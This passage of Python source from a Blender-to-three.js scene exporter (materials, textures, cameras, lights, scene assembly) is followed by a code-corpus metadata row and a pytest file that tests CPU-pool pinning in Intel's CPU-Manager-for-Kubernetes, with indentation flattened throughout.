matrix_world = obj.matrix_world
position, quaternion, scale = matrix_world.decompose()
rotation = quaternion.to_euler("ZYX")
# use empty material string for multi-material objects
# this will trigger use of MeshFaceMaterial in SceneLoader
material_string = '""'
if len(material_ids) == 1:
material_string = generate_string_list(material_ids)
group_string = ""
if len(group_ids) > 0:
group_string = generate_string_list(group_ids)
castShadow = obj.THREE_castShadow
receiveShadow = obj.THREE_receiveShadow
doubleSided = obj.THREE_doubleSided
visible = True
geometry_string = generate_string(geometry_id)
object_string = TEMPLATE_OBJECT % {
"object_id" : generate_string(object_id),
"geometry_id" : geometry_string,
"group_id" : group_string,
"material_id" : material_string,
"position" : generate_vec3(position),
"rotation" : generate_vec3(rotation),
"quaternion" : generate_quat(quaternion),
"scale" : generate_vec3(scale),
"castShadow" : generate_bool_property(castShadow),
"receiveShadow" : generate_bool_property(receiveShadow),
"doubleSided" : generate_bool_property(doubleSided),
"visible" : generate_bool_property(visible)
}
chunks.append(object_string)
elif obj.type == "EMPTY" or (obj.type == "MESH" and not obj.THREE_exportGeometry):
object_id = obj.name
group_ids = generate_group_id_list(obj)
if data["flipyz"]:
matrix_world = ROTATE_X_PI2 * obj.matrix_world
else:
matrix_world = obj.matrix_world
position, quaternion, scale = matrix_world.decompose()
rotation = quaternion.to_euler("ZYX")
group_string = ""
if len(group_ids) > 0:
group_string = generate_string_list(group_ids)
object_string = TEMPLATE_EMPTY % {
"object_id" : generate_string(object_id),
"group_id" : group_string,
"position" : generate_vec3(position),
"rotation" : generate_vec3(rotation),
"quaternion" : generate_quat(quaternion),
"scale" : generate_vec3(scale)
}
chunks.append(object_string)
return ",\n\n".join(chunks), len(chunks)
# #####################################################
# Scene exporter - geometries
# #####################################################
def generate_geometries(data):
chunks = []
geo_set = set()
for obj in data["objects"]:
if obj.type == "MESH" and obj.THREE_exportGeometry:
#if len(obj.modifiers) > 0:
# name = obj.name
#else:
name = obj.data.name
if name not in geo_set:
geometry_id = "geo_%s" % name
if data["embed_meshes"]:
embed_id = "emb_%s" % name
geometry_string = TEMPLATE_GEOMETRY_EMBED % {
"geometry_id" : generate_string(geometry_id),
"embed_id" : generate_string(embed_id)
}
else:
model_filename = os.path.basename(generate_mesh_filename(name, data["filepath"]))
geometry_string = TEMPLATE_GEOMETRY_LINK % {
"geometry_id" : generate_string(geometry_id),
"model_file" : generate_string(model_filename)
}
chunks.append(geometry_string)
geo_set.add(name)
return ",\n\n".join(chunks), len(chunks)
# #####################################################
# Scene exporter - textures
# #####################################################
def generate_textures_scene(data):
chunks = []
# TODO: extract just textures actually used by some objects in the scene
for texture in bpy.data.textures:
if texture.type == 'IMAGE' and texture.image and texture.users > 0 and len(texture.users_material) > 0:
img = texture.image
texture_id = img.name
texture_file = extract_texture_filename(img)
if data["copy_textures"]:
save_image(img, texture_file, data["filepath"])
extras = ""
if texture.repeat_x != 1 or texture.repeat_y != 1:
extras += ',\n "repeat": [%g, %g]' % (texture.repeat_x, texture.repeat_y)
if texture.extension == "REPEAT":
wrap_x = "repeat"
wrap_y = "repeat"
if texture.use_mirror_x:
wrap_x = "mirror"
if texture.use_mirror_y:
wrap_y = "mirror"
extras += ',\n "wrap": ["%s", "%s"]' % (wrap_x, wrap_y)
texture_string = TEMPLATE_TEXTURE % {
"texture_id" : generate_string(texture_id),
"texture_file" : generate_string(texture_file),
"extras" : extras
}
chunks.append(texture_string)
return ",\n\n".join(chunks), len(chunks)
def extract_texture_filename(image):
fn = bpy.path.abspath(image.filepath)
fn = os.path.normpath(fn)
fn_strip = os.path.basename(fn)
return fn_strip
def save_image(img, name, fpath):
dst_dir = os.path.dirname(fpath)
dst_path = os.path.join(dst_dir, name)
ensure_folder_exist(dst_dir)
if img.packed_file:
img.save_render(dst_path)
else:
src_path = bpy.path.abspath(img.filepath)
shutil.copy(src_path, dst_dir)
# #####################################################
# Scene exporter - materials
# #####################################################
def extract_material_data(m, option_colors):
world = bpy.context.scene.world
material = { 'name': m.name }
material['colorDiffuse'] = [m.diffuse_intensity * m.diffuse_color[0],
m.diffuse_intensity * m.diffuse_color[1],
m.diffuse_intensity * m.diffuse_color[2]]
material['colorSpecular'] = [m.specular_intensity * m.specular_color[0],
m.specular_intensity * m.specular_color[1],
m.specular_intensity * m.specular_color[2]]
material['colorAmbient'] = [m.ambient * material['colorDiffuse'][0],
m.ambient * material['colorDiffuse'][1],
m.ambient * material['colorDiffuse'][2]]
material['colorEmissive'] = [m.emit * material['colorDiffuse'][0],
m.emit * material['colorDiffuse'][1],
m.emit * material['colorDiffuse'][2]]
material['transparency'] = m.alpha
# not sure about mapping values to Blinn-Phong shader
# Blender uses INT from [1,511] with default 0
# http://www.blender.org/documentation/blender_python_api_2_54_0/bpy.types.Material.html#bpy.types.Material.specular_hardness
material["specularCoef"] = m.specular_hardness
material["vertexColors"] = m.THREE_useVertexColors and option_colors
material['mapDiffuse'] = ""
material['mapLight'] = ""
material['mapSpecular'] = ""
material['mapNormal'] = ""
material['mapBump'] = ""
material['mapNormalFactor'] = 1.0
material['mapBumpScale'] = 1.0
textures = guess_material_textures(m)
if textures['diffuse']:
material['mapDiffuse'] = textures['diffuse']['texture'].image.name
if textures['light']:
material['mapLight'] = textures['light']['texture'].image.name
if textures['specular']:
material['mapSpecular'] = textures['specular']['texture'].image.name
if textures['normal']:
material['mapNormal'] = textures['normal']['texture'].image.name
if textures['normal']['slot'].use_map_normal:
material['mapNormalFactor'] = textures['normal']['slot'].normal_factor
if textures['bump']:
material['mapBump'] = textures['bump']['texture'].image.name
if textures['bump']['slot'].use_map_normal:
material['mapBumpScale'] = textures['bump']['slot'].normal_factor
material['shading'] = m.THREE_materialType
material['blending'] = m.THREE_blendingType
material['depthWrite'] = m.THREE_depthWrite
material['depthTest'] = m.THREE_depthTest
material['transparent'] = m.use_transparency
return material
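# Illustrative example of the channel scaling above: a material with
# diffuse_color (1.0, 0.5, 0.25) and diffuse_intensity 0.8 yields
# colorDiffuse = [0.8, 0.4, 0.2]; colorAmbient and colorEmissive then scale
# that same list by m.ambient and m.emit respectively.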
def guess_material_textures(material):
textures = {
'diffuse' : None,
'light' : None,
'normal' : None,
'specular': None,
'bump' : None
}
# just take first textures of each, for the moment three.js materials can't handle more
# assume diffuse comes before lightmap, normalmap has checked flag
for i in range(len(material.texture_slots)):
slot = material.texture_slots[i]
if slot:
texture = slot.texture
if slot.use and texture and texture.type == 'IMAGE':
# normal map in Blender UI: textures => image sampling => normal map
if texture.use_normal_map:
textures['normal'] = { "texture": texture, "slot": slot }
# bump map in Blender UI: textures => influence => geometry => normal
elif slot.use_map_normal:
textures['bump'] = { "texture": texture, "slot": slot }
elif slot.use_map_specular or slot.use_map_hardness:
textures['specular'] = { "texture": texture, "slot": slot }
else:
if not textures['diffuse'] and not slot.blend_type == 'MULTIPLY':
textures['diffuse'] = { "texture": texture, "slot": slot }
else:
textures['light'] = { "texture": texture, "slot": slot }
if textures['diffuse'] and textures['normal'] and textures['light'] and textures['specular'] and textures['bump']:
break
return textures
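# Sketch of the heuristic above (material name hypothetical): a slot whose
# texture has use_normal_map set wins the 'normal' slot, a slot with only the
# use_map_normal influence is treated as 'bump', specular/hardness influence
# maps to 'specular', and the first remaining non-MULTIPLY image slot becomes
# 'diffuse' while later ones fall through to 'light'.
#
#   tex = guess_material_textures(bpy.data.materials["MyMaterial"])
#   if tex['diffuse']:
#       print(tex['diffuse']['texture'].image.name)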
def generate_material_string(material):
material_id = material["name"]
# default to Lambert
shading = material.get("shading", "Lambert")
# normal and bump mapped materials must use Phong
# to get all required parameters for normal shader
if material['mapNormal'] or material['mapBump']:
shading = "Phong"
type_map = {
"Lambert" : "MeshLambertMaterial",
"Phong" : "MeshPhongMaterial"
}
material_type = type_map.get(shading, "MeshBasicMaterial")
parameters = '"color": %d' % rgb2int(material["colorDiffuse"])
parameters += ', "ambient": %d' % rgb2int(material["colorDiffuse"])
parameters += ', "emissive": %d' % rgb2int(material["colorEmissive"])
parameters += ', "opacity": %.2g' % material["transparency"]
if shading == "Phong":
parameters += ', "ambient": %d' % rgb2int(material["colorAmbient"])
parameters += ', "emissive": %d' % rgb2int(material["colorEmissive"])
parameters += ', "specular": %d' % rgb2int(material["colorSpecular"])
parameters += ', "shininess": %.1g' % material["specularCoef"]
colorMap = material['mapDiffuse']
lightMap = material['mapLight']
specularMap = material['mapSpecular']
normalMap = material['mapNormal']
bumpMap = material['mapBump']
normalMapFactor = material['mapNormalFactor']
bumpMapScale = material['mapBumpScale']
if colorMap:
parameters += ', "map": %s' % generate_string(colorMap)
if lightMap:
parameters += ', "lightMap": %s' % generate_string(lightMap)
if specularMap:
parameters += ', "specularMap": %s' % generate_string(specularMap)
if normalMap:
parameters += ', "normalMap": %s' % generate_string(normalMap)
if bumpMap:
parameters += ', "bumpMap": %s' % generate_string(bumpMap)
if normalMapFactor != 1.0:
parameters += ', "normalMapFactor": %g' % normalMapFactor
if bumpMapScale != 1.0:
parameters += ', "bumpMapScale": %g' % bumpMapScale
if material['vertexColors']:
parameters += ', "vertexColors": "vertex"'
if material['transparent']:
parameters += ', "transparent": true'
parameters += ', "blending": "%s"' % material['blending']
if not material['depthWrite']:
parameters += ', "depthWrite": false'
if not material['depthTest']:
parameters += ', "depthTest": false'
material_string = TEMPLATE_MATERIAL_SCENE % {
"material_id" : generate_string(material_id),
"type" : generate_string(material_type),
"parameters" : parameters
}
return material_string
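# Illustration of the parameter string assembled above (the JSON wrapper
# itself comes from TEMPLATE_MATERIAL_SCENE, defined earlier in this file;
# the texture name is hypothetical and the exact integer depends on
# rgb2int's 8-bit channel scaling, 0xCC0000 here for roughly (0.8, 0, 0)):
#
#   "color": 13369344, "ambient": 13369344, "emissive": 0, "opacity": 1,
#   "map": "diffuse.png", "blending": "NormalBlending"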
def generate_materials_scene(data):
chunks = []
def material_is_used(mat):
minimum_users = 1
if mat.use_fake_user:
minimum_users = 2 #we must ignore the "fake user" in this case
return mat.users >= minimum_users
used_materials = [m for m in bpy.data.materials if material_is_used(m)]
for m in used_materials:
material = extract_material_data(m, data["use_colors"])
material_string = generate_material_string(material)
chunks.append(material_string)
return ",\n\n".join(chunks), len(chunks)
# #####################################################
# Scene exporter - cameras
# #####################################################
def generate_cameras(data):
chunks = []
if data["use_cameras"]:
cams = bpy.data.objects
cams = [ob for ob in cams if (ob.type == 'CAMERA')]
if not cams:
camera = DEFAULTS["camera"]
if camera["type"] == "PerspectiveCamera":
camera_string = TEMPLATE_CAMERA_PERSPECTIVE % {
"camera_id" : generate_string(camera["name"]),
"fov" : camera["fov"],
"aspect" : camera["aspect"],
"near" : camera["near"],
"far" : camera["far"],
"position" : generate_vec3(camera["position"]),
"target" : generate_vec3(camera["target"])
}
elif camera["type"] == "OrthographicCamera":
camera_string = TEMPLATE_CAMERA_ORTHO % {
"camera_id" : generate_string(camera["name"]),
"left" : camera["left"],
"right" : camera["right"],
"top" : camera["top"],
"bottom" : camera["bottom"],
"near" : camera["near"],
"far" : camera["far"],
"position" : generate_vec3(camera["position"]),
"target" : generate_vec3(camera["target"])
}
chunks.append(camera_string)
else:
for cameraobj in cams:
camera = bpy.data.cameras[cameraobj.data.name]
if camera.id_data.type == "PERSP":
camera_string = TEMPLATE_CAMERA_PERSPECTIVE % {
"camera_id" : generate_string(cameraobj.name),
"fov" : (camera.angle / 3.14) * 180.0,
"aspect" : 1.333,
"near" : camera.clip_start,
"far" : camera.clip_end,
"position" : generate_vec3([cameraobj.location[0], -cameraobj.location[1], cameraobj.location[2]], data["flipyz"]),
"target" : generate_vec3([0, 0, 0])
}
elif camera.id_data.type == "ORTHO":
camera_string = TEMPLATE_CAMERA_ORTHO % {
"camera_id" : generate_string(camera.name),
"left" : -(camera.angle_x * camera.ortho_scale),
"right" : (camera.angle_x * camera.ortho_scale),
"top" : (camera.angle_y * camera.ortho_scale),
"bottom" : -(camera.angle_y * camera.ortho_scale),
"near" : camera.clip_start,
"far" : camera.clip_end,
"position" : generate_vec3([cameraobj.location[0], -cameraobj.location[1], cameraobj.location[2]], data["flipyz"]),
"target" : generate_vec3([0, 0, 0])
}
chunks.append(camera_string)
return ",\n\n".join(chunks), len(chunks)
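# Note on the perspective branch above: camera.angle is in radians, so
# (camera.angle / 3.14) * 180.0 is an approximate radians-to-degrees
# conversion; math.degrees(camera.angle) would be the exact equivalent.
# The hard-coded 1.333 aspect simply assumes a 4:3 render target.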
# #####################################################
# Scene exporter - lights
# #####################################################
def generate_lights(data):
chunks = []
if data["use_lights"]:
lamps = data["objects"]
lamps = [ob for ob in lamps if (ob.type == 'LAMP')]
for lamp in lamps:
light_string = ""
concrete_lamp = lamp.data
if concrete_lamp.type == "POINT":
light_string = TEMPLATE_LIGHT_POINT % {
"light_id" : generate_string(concrete_lamp.name),
"position" : generate_vec3(lamp.location, data["flipyz"]),
"rotation" : generate_vec3(lamp.rotation_euler, data["flipyz"]),
"color" : rgb2int(concrete_lamp.color),
"distance" : concrete_lamp.distance,
"intensity" : concrete_lamp.energy
}
elif concrete_lamp.type == "SUN":
light_string = TEMPLATE_LIGHT_SUN % {
"light_id" : generate_string(concrete_lamp.name),
"position" : generate_vec3(lamp.location, data["flipyz"]),
"rotation" : generate_vec3(lamp.rotation_euler, data["flipyz"]),
"color" : rgb2int(concrete_lamp.color),
"distance" : concrete_lamp.distance,
"intensity" : concrete_lamp.energy
}
elif concrete_lamp.type == "SPOT":
light_string = TEMPLATE_LIGHT_SPOT % {
"light_id" : generate_string(concrete_lamp.name),
"position" : generate_vec3(lamp.location, data["flipyz"]),
"rotation" : generate_vec3(lamp.rotation_euler, data["flipyz"]),
"color" : rgb2int(concrete_lamp.color),
"distance" : concrete_lamp.distance,
"intensity" : concrete_lamp.energy,
"use_shadow" : concrete_lamp.use_shadow,
"angle" : concrete_lamp.spot_size
}
elif concrete_lamp.type == "HEMI":
light_string = TEMPLATE_LIGHT_HEMI % {
"light_id" : generate_string(concrete_lamp.name),
"position" : generate_vec3(lamp.location, data["flipyz"]),
"rotation" : generate_vec3(lamp.rotation_euler, data["flipyz"]),
"color" : rgb2int(concrete_lamp.color),
"distance" : concrete_lamp.distance,
"intensity" : concrete_lamp.energy
}
elif concrete_lamp.type == "AREA":
light_string = TEMPLATE_LIGHT_AREA % {
"light_id" : generate_string(concrete_lamp.name),
"position" : generate_vec3(lamp.location, data["flipyz"]),
"rotation" : generate_vec3(lamp.rotation_euler, data["flipyz"]),
"color" : rgb2int(concrete_lamp.color),
"distance" : concrete_lamp.distance,
"intensity" : concrete_lamp.energy,
"gamma" : concrete_lamp.gamma,
"shape" : concrete_lamp.shape,
"size" : concrete_lamp.size,
"size_y" : concrete_lamp.size_y
}
chunks.append(light_string)
if not lamps:
lamps.append(DEFAULTS["light"])
return ",\n\n".join(chunks), len(chunks)
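# Note: the DEFAULTS["light"] fallback above is appended only after the loop
# has finished, so it never contributes a chunk to the returned string; a
# default light would have to be injected before iterating for it to take
# effect.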
# #####################################################
# Scene exporter - embedded meshes
# #####################################################
def generate_embeds(data):
if data["embed_meshes"]:
chunks = []
for e in data["embeds"]:
embed = '"emb_%s": {%s}' % (e, data["embeds"][e])
chunks.append(embed)
return ",\n\n".join(chunks)
return ""
# #####################################################
# Scene exporter - generate ASCII scene
# #####################################################
def generate_ascii_scene(data):
objects, nobjects = generate_objects(data)
geometries, ngeometries = generate_geometries(data)
textures, ntextures = generate_textures_scene(data)
materials, nmaterials = generate_materials_scene(data)
lights, nlights = generate_lights(data)
cameras, ncameras = generate_cameras(data)
embeds = generate_embeds(data)
if nlights > 0:
if nobjects > 0:
objects = objects + ",\n\n" + lights
else:
objects = lights
nobjects += nlights
if ncameras > 0:
if nobjects > 0:
objects = objects + ",\n\n" + cameras
else:
objects = cameras
nobjects += ncameras
basetype = "relativeTo"
if data["base_html"]:
basetype += "HTML"
else:
basetype += "Scene"
sections = [
["objects", objects],
["geometries", geometries],
["textures", textures],
["materials", materials],
["embeds", embeds]
]
chunks = []
for label, content in sections:
if content:
chunks.append(generate_section(label, content))
sections_string = "\n".join(chunks)
default_camera = ""
if data["use_cameras"]:
cams = [ob for ob in bpy.data.objects if (ob.type == 'CAMERA' and ob.select)]
if not cams:
default_camera = "default_camera"
else:
default_camera = cams[0].name
parameters = {
"fname" : data["source_file"],
"sections" : sections_string,
"bgcolor" : generate_vec3(DEFAULTS["bgcolor"]),
"bgalpha" : DEFAULTS["bgalpha"],
"defcamera" : generate_string(default_camera),
"nobjects" : nobjects,
"ngeometries" : ngeometries,
"ntextures" : ntextures,
"basetype" : generate_string(basetype),
"nmaterials" : nmaterials,
"position" : generate_vec3(DEFAULTS["position"]),
"rotation" : generate_vec3(DEFAULTS["rotation"]),
"scale" : generate_vec3(DEFAULTS["scale"])
}
text = TEMPLATE_SCENE_ASCII % parameters
return text
def export_scene(scene, filepath, flipyz, option_colors, option_lights, option_cameras, option_embed_meshes, embeds, option_url_base_html, option_copy_textures):
source_file = os.path.basename(bpy.data.filepath)
# objects are contained in scene and linked groups
objects = []
# get scene objects
sceneobjects = scene.objects
for obj in sceneobjects:
objects.append(obj)
scene_text = ""
data = {
"scene" : scene,
"objects" : objects,
"embeds" : embeds,
"source_file" : source_file,
"filepath" : filepath,
"flipyz" : flipyz,
"use_colors" : option_colors,
"use_lights" : option_lights,
"use_cameras" : option_cameras,
"embed_meshes" : option_embed_meshes,
"base_html" : option_url_base_html,
"copy_textures": option_copy_textures
}
scene_text += generate_ascii_scene(data)
write_file(filepath, scene_text)
# #####################################################
# Main
# #####################################################
def save(operator, context, filepath = "",
option_flip_yz = True,
option_vertices = True,
option_vertices_truncate = False,
option_faces = True,
option_normals = True,
option_uv_coords = True,
option_materials = True,
option_colors = True,
option_bones = True,
option_skinning = True,
align_model = 0,
option_export_scene = False,
option_lights = False,
option_cameras = False,
option_scale = 1.0,
option_embed_meshes = True,
option_url_base_html = False,
option_copy_textures = False,
option_animation_morph = False,
option_animation_skeletal = False,
option_frame_step = 1,
option_all_meshes = True,
option_frame_index_as_time = False):
#print("URL TYPE", option_url_base_html)
filepath = ensure_extension(filepath, '.js')
scene = context.scene
if scene.objects.active:
bpy.ops.object.mode_set(mode='OBJECT')
if option_all_meshes:
sceneobjects = scene.objects
else:
sceneobjects = context.selected_objects
# objects are contained in scene and linked groups
objects = []
# get scene objects
for obj in sceneobjects:
objects.append(obj)
if option_export_scene:
geo_set = set()
embeds = {}
for object in objects:
if object.type == "MESH" and object.THREE_exportGeometry:
# create extra copy of geometry with applied modifiers
# (if they exist)
#if len(object.modifiers) > 0:
# name = object.name
# otherwise can share geometry
#else:
name = object.data.name
if name not in geo_set:
if option_embed_meshes:
text, model_string = generate_mesh_string([object], scene,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
False, # align_model
option_flip_yz,
option_scale,
False, # export_single_model
False, # option_copy_textures
filepath,
option_animation_morph,
option_animation_skeletal,
option_frame_index_as_time,
option_frame_step)
embeds[object.data.name] = model_string
else:
fname = generate_mesh_filename(name, filepath)
export_mesh([object], scene,
fname,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
False, # align_model
option_flip_yz,
option_scale,
False, # export_single_model
option_copy_textures,
option_animation_morph,
option_animation_skeletal,
option_frame_step,
option_frame_index_as_time)
geo_set.add(name)
export_scene(scene, filepath,
option_flip_yz,
option_colors,
option_lights,
option_cameras,
option_embed_meshes,
embeds,
option_url_base_html,
option_copy_textures)
else:
export_mesh(objects, scene, filepath,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
option_flip_yz,
option_scale,
True, # export_single_model
option_copy_textures,
option_animation_morph,
option_animation_skeletal,
option_frame_step,
option_frame_index_as_time)
return {'FINISHED'}
| mit | 1,092,684,765,250,428,200 | 30.502408 | 165 | 0.52047 | false |
Intel-Corp/CPU-Manager-for-Kubernetes | tests/unit/test_isolate.py | 1 | 11645 | from intel import isolate, config
from unittest.mock import patch, MagicMock
import pytest
import os
EXCL_ONE = [
{
"pool": "exclusive",
"socket": "0",
"cl": "0,11",
"tasks": ["123"]
}
]
SHAR_ONE = [
{
"pool": "shared",
"socket": "0",
"cl": "4,15,5,16",
"tasks": ["123"]
}
]
INF_ONE = [
{
"pool": "infra",
"socket": "0",
"cl": "6,17,7,18,8,19",
"tasks": ["123"]
}
]
EXNI_ONE = [
{
"pool": "exclusive-non-isolcpus",
"socket": "0",
"cl": "9,20",
"tasks": ["123"]
}
]
FAKE_CONFIG = {
"exclusive": {
"0": {
"0,11": [],
"1,12": [],
"2,13": []
},
"1": {
"3,14": []
}
},
"shared": {
"0": {
"4,15,5,16": []
},
"1": {}
},
"infra": {
"0": {
"6,17,7,18,8,19": []
},
"1": {}
},
"exclusive-non-isolcpus": {
"0": {
"9,20": [],
"10,21": []
},
"1": {}
}
}
def return_config(conf):
c = FAKE_CONFIG
for item in conf:
c[item["pool"]][item["socket"]][item["cl"]] = item["tasks"]
return config.build_config(c)
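# Illustrative use of the helper above: return_config(EXCL_ONE) starts from
# FAKE_CONFIG and marks core list "0,11" of socket "0" in the "exclusive"
# pool as owned by task "123", so tests exercising allocation must skip it
# and pick the next free list ("1,12").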
class MockConfig(config.Config):
def __init__(self, conf):
self.cm_name = "fake-name"
self.owner = "fake-owner"
self.c_data = conf
def lock(self):
return
def unlock(self):
return
class MockProcess():
def __init__(self):
self.pid = 9
self.affinity = []
def cpu_affinity(self, cpus=None):
if not cpus:
return self.get_cpu_affinity()
else:
self.set_cpu_affinity(cpus)
def get_cpu_affinity(self):
return self._cpu_affin
def set_cpu_affinity(self, new_affin):
self._cpu_affin = new_affin
class MockChild():
def __init__(self):
self.name = "child"
self.terminate = "term"
def wait(self):
return
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
@patch('intel.k8s.delete_config_map',
MagicMock(return_value=''))
@patch('intel.config.Config.lock', MagicMock(return_value=''))
@patch('intel.config.Config.unlock', MagicMock(return_value=''))
def test_isolate_exclusive1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process', MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [0, 11]
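# With an empty config every core list in the exclusive pool is free, so the
# first list on socket "0" ("0,11") is assigned and pinned through the mocked
# psutil.Process affinity call.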
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive2():
p = MockProcess()
c = MockConfig(return_config(EXCL_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [1, 12]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive3():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id="1")
assert p.cpu_affinity() == [3, 14]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [4, 15, 5, 16]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared2():
p = MockProcess()
c = MockConfig(return_config(SHAR_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [4, 15, 5, 16]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_infra1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("infra", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [6, 17, 7, 18, 8, 19]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_infra2():
p = MockProcess()
c = MockConfig(return_config(INF_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("infra", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [6, 17, 7, 18, 8, 19]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive_non_isolcpus2():
p = MockProcess()
c = MockConfig(return_config(EXNI_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive-non-isolcpus", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert p.cpu_affinity() == [10, 21]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_pool_not_exist():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(KeyError) as err:
isolate.isolate("fake-pool", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert err is not None
assert err.value.args[0] == "Requested pool fake-pool does not exist"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch('os.getenv', MagicMock(return_value=0))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_n_cpus_lt_one():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(ValueError) as err:
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert err is not None
assert err.value.args[0] == "Requested numbers of cores "\
"must be positive integer"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch('os.getenv', MagicMock(return_value=5))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_not_enough_cpus():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(SystemError) as err:
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id=None)
assert err is not None
assert err.value.args[0] == "Not enough free cpu lists "\
"in pool exclusive"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared_failure1():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(SystemError) as err:
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], "fake-namespace",
socket_id="1")
assert err is not None
assert err.value.args[0] == "No cpu lists in pool shared"
